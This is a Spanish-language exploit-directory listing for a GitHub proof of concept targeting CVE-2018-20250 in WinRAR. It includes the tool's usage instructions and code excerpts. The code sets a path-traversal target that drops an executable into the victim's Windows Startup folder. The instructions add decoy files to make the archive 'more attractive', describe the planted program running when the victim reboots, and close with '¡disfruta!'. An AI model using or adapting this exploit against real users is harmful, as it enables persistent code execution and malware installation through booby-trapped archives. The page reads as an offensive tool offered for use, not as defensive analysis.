Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-20250 — exploit para https://research.checkpoint.com/extracting-code-execution-from-winrar | Kitploit
Herramientas/GitHubGitHub/wyatu/cve-2018-20250
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubwyatu/cve-2018-20250

CVE-2018-20250

exploit para https://research.checkpoint.com/extracting-code-execution-from-winrar

Ver Repositorio
492171hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

exp para Extraer Ejecución de Código de Winrar

poc por Ridter

¿cómo usarlo?

solo necesitas instalar Python 3.7 y preparar un archivo malicioso que quieras ejecutar, establecer los valores que desees, ¡este script exp generará el archivo malicioso automáticamente!

  1. establece los valores que desees
root@kitploit:~
... ...

# El nombre del archivo comprimido deseado
rar_filename = "test.rar"
# El archivo malicioso que quieres ejecutar
evil_filename = "calc.exe"
# La ruta de descompresión deseada, como se muestra a continuación
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Otros archivos que se mostrarán cuando la víctima abra el winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # Este comando puede ser diferente, depende del entorno Python3.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. ejecuta el exp, este generará test.rar automáticamente

  2. si la víctima abre test.rar, verá los archivos hello.txt y world.txt, puedes añadir más archivos, más atractivos.

  1. cuando descomprima el archivo, el directorio de inicio de sesión del usuario de la víctima tendrá un archivo más llamado hi.exe, que en realidad es calc.exe. cuando reinicie el ordenador, hi.exe se ejecutará.

¡disfruta! :)

Descargar herramienta